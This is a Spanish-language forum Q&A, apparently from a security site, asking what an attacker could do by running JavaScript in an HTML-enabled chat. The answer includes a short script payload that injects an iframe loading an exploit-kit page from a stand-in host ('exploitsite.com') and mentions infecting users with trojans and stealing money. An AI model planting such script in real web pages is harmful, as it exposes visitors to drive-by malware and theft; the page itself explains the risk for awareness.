Para un chat en línea que permite HTML básico, ¿qué sucede si dejan una forma abierta para que un pirata informático potencial ejecute javascript en todas las personas que están en el chat?
¿Qué es lo peor que podrían hacer?
Para un chat en línea que permite HTML básico, ¿qué sucede si dejan una forma abierta para que un pirata informático potencial ejecute javascript en todas las personas que están en el chat?
¿Qué es lo peor que podrían hacer?
Crea un nuevo iframe y carga el kit de explotación dentro de iframe.
<script language="JavaScript" type="text/javascript">
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://exploitsite.com/");
ifrm.style.width = 640+"px";
ifrm.style.height = 480+"px";
document.body.appendChild(ifrm);
</script>
Infecta a los usuarios con troyanos, úsalos como bots, roba su dinero, etc. ...
Lea otras preguntas en las etiquetas web-application attacks web-browser attack-prevention javascript